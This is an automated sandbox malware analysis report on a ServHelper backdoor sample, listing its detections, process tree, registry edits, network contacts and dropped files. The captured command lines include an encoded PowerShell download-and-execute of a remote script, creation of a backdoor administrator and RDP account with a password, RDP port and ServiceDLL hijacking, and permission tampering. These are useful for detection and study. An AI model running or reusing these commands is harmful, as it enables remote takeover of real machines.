Malware Analysis Report

2024-10-19 04:38

Sample ID 210922-hzlcvaeecq
Target 61d5e32562d1c70daf0a3112f7888258.exe
SHA256 da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605
Tags
servhelper backdoor discovery exploit persistence suricata trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605

Threat Level: Known bad

The file 61d5e32562d1c70daf0a3112f7888258.exe was found to be: Known bad.

Malicious Activity Summary

servhelper backdoor discovery exploit persistence suricata trojan upx

suricata: ET MALWARE ServHelper CnC Inital Checkin

ServHelper

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

Possible privilege escalation attempt

Blocklisted process makes network request

UPX packed file

Loads dropped DLL

Modifies file permissions

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Script User-Agent

Suspicious use of AdjustPrivilegeToken

Runs net.exe

Modifies registry key

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-09-22 07:10

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-22 07:10

Reported

2021-09-22 07:13

Platform

win7v20210408

Max time kernel

137s

Max time network

180s

Command Line

"C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"

Signatures

ServHelper

trojan backdoor servhelper

suricata: ET MALWARE ServHelper CnC Inital Checkin

suricata

Grants admin privileges

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\rfxvmt.dll C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ce72d115-2a14-4d96-82c1-423615b22f64 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c2b2a3a3-6d66-4fff-b722-1374efd0e345 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b1c2efd2-c4a6-4a3d-871a-ad88f9e19c99 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e484b633-43f2-4341-9cf8-8d0482f56207 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\697JC32QH7VC53QJMTQA.temp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b37b9c97-90dd-462d-863b-fa4071a4b59e C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6f584eb7-a5c9-47e6-94fe-eab0302050e6 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_962932c3-718a-4659-bd9f-f8a703b735bc C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_92e09941-4f06-487c-b110-16566a51d47d C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3d23646-1a6f-480b-8620-8400d86db01a C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_11b1ba59-eb8c-4543-9b2d-07cd4cb78241 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_74dcc402-ab53-44ba-a397-6abd4975fcf8 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 40233aed91afd701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1984 wrote to memory of 1316 N/A C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1984 wrote to memory of 1316 N/A C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1984 wrote to memory of 1316 N/A C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1316 wrote to memory of 656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1316 wrote to memory of 656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1316 wrote to memory of 656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 656 wrote to memory of 796 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 656 wrote to memory of 796 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 656 wrote to memory of 796 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1316 wrote to memory of 1480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1316 wrote to memory of 1480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1316 wrote to memory of 1480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1316 wrote to memory of 1096 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1316 wrote to memory of 1096 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1316 wrote to memory of 1096 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1316 wrote to memory of 1836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1316 wrote to memory of 1836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1316 wrote to memory of 1836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1316 wrote to memory of 688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 1316 wrote to memory of 688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 1316 wrote to memory of 688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 1316 wrote to memory of 1396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1316 wrote to memory of 1396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1316 wrote to memory of 1396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1316 wrote to memory of 1772 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1316 wrote to memory of 1772 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1316 wrote to memory of 1772 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1316 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1316 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1316 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1316 wrote to memory of 1056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1316 wrote to memory of 1056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1316 wrote to memory of 1056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1316 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1316 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1316 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1316 wrote to memory of 1888 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1316 wrote to memory of 1888 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1316 wrote to memory of 1888 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1316 wrote to memory of 1840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1316 wrote to memory of 1840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1316 wrote to memory of 1840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1316 wrote to memory of 1108 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1316 wrote to memory of 1108 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1316 wrote to memory of 1108 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1316 wrote to memory of 1600 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1316 wrote to memory of 1600 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1316 wrote to memory of 1600 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1316 wrote to memory of 336 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1316 wrote to memory of 336 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1316 wrote to memory of 336 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1316 wrote to memory of 1492 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1316 wrote to memory of 1492 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1316 wrote to memory of 1492 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1492 wrote to memory of 784 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1492 wrote to memory of 784 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1492 wrote to memory of 784 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1316 wrote to memory of 1708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1316 wrote to memory of 1708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1316 wrote to memory of 1708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1708 wrote to memory of 1092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1708 wrote to memory of 1092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1708 wrote to memory of 1092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1092 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe

"C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\05jmqopu\05jmqopu.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES32A3.tmp" "c:\Users\Admin\AppData\Local\Temp\05jmqopu\CSCA0D889081A1743489B4E2093EAD758D3.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc M6LqWVFh /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc M6LqWVFh /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc M6LqWVFh /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc M6LqWVFh

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc M6LqWVFh

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc M6LqWVFh

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 zuvujvhuaif.xyz udp
MD 185.163.45.186:443 zuvujvhuaif.xyz tcp

Files

memory/1984-59-0x0000000041390000-0x000000004178F000-memory.dmp

memory/1984-63-0x0000000028156000-0x0000000028157000-memory.dmp

memory/1984-62-0x0000000028154000-0x0000000028156000-memory.dmp

memory/1984-61-0x0000000028152000-0x0000000028154000-memory.dmp

memory/1984-64-0x0000000028157000-0x0000000028158000-memory.dmp

memory/1316-65-0x0000000000000000-mapping.dmp

memory/1316-66-0x000007FEFB761000-0x000007FEFB763000-memory.dmp

memory/1316-67-0x0000000002540000-0x0000000002541000-memory.dmp

memory/1316-68-0x000000001AAF0000-0x000000001AAF1000-memory.dmp

memory/1316-69-0x000000001AA70000-0x000000001AA72000-memory.dmp

memory/1316-70-0x000000001AA74000-0x000000001AA76000-memory.dmp

memory/1316-71-0x00000000023F0000-0x00000000023F1000-memory.dmp

memory/1316-72-0x0000000002600000-0x0000000002601000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

memory/1316-74-0x000000001C400000-0x000000001C401000-memory.dmp

memory/656-75-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\05jmqopu\05jmqopu.cmdline

MD5 38ca099785e8d2627d2b4f2b77f74a5a
SHA1 96fb1a0e1573f5c05186c8d955ee3f04d3c7fed4
SHA256 6994850a1f465eaa42bdcb597334388b06ab4d2651f69d19ecddfa68939b35ab
SHA512 2315df429f5405ced24ae2129c3c0fb79df84bc5c6a9dde26255111e711c66c86d4ea34cfb0857dfca8912d12f459dbaa52424335188fef7257ac201cc10c76c

\??\c:\Users\Admin\AppData\Local\Temp\05jmqopu\05jmqopu.0.cs

MD5 9f8ab7eb0ab21443a2fe06dab341510e
